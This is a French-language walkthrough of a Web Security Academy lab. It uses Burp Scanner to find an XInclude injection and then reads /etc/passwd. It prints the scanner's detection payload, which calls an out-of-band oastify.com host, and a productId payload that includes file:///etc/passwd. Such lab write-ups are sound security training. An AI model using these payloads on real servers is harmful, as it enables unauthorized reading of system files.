Détection rapide avec un scan ciblé

Discovering vulnerabilities quickly with targeted scanning

Lab: Discovering vulnerabilities quickly with targeted scanning | Web Security AcademyWebSecAcademy

Contexte du lab

Ce laboratoire contient une vulnérabilité permettant de lire des fichiers arbitraires sur le serveur. L’objectif est de récupérer le contenu du fichier /etc/passwd en moins de 10 minutes.

En raison de cette contrainte de temps, il est recommandé d’utiliser Burp Scanner plutôt qu’un audit complet de l’application.

Contrainte temporelle

Un compteur de 10 minutes est actif dès le lancement du lab.
Un scan global du site risque d’être trop lent.
Il est donc préférable de cibler intelligemment des points d’entrée potentiellement vulnérables.

Méthodologie

Intercepter une requête HTTP pertinente avec Burp Proxy.

Analyser rapidement la logique de la requête pour identifier un endpoint intéressant.

Lancer un scan ciblé via Burp Scanner sur cette requête précise.

Configuration du scan Burp

Type de scan sélectionné : Crawl and Audit

Mode : Scan rapide

Objectif : identifier rapidement un vecteur d’attaque exploitable

Vulnérabilité identifiée

Le scan révèle une vulnérabilité de type XML Injection (XInclude).

Payload initial détecté par Burp Scanner :

<oid xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include href="http://mrh1ja6l5f029m1pdnomovjvomufik6ludh35s.oastify.com/foo"/></oid>

Cela confirme que le serveur traite des entités XInclude sans restriction.

Exploitation : lecture de `/etc/passwd`

Le payload est modifié afin d’inclure un fichier local du système :

productId=<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>
id>&storeId=1

Mis à jour il y a 1 mois

hashtagDiscovering vulnerabilities quickly with targeted scanning

hashtagContexte du lab

hashtagContrainte temporelle

hashtagMéthodologie

hashtagConfiguration du scan Burp

hashtagVulnérabilité identifiée

hashtagExploitation : lecture de /etc/passwd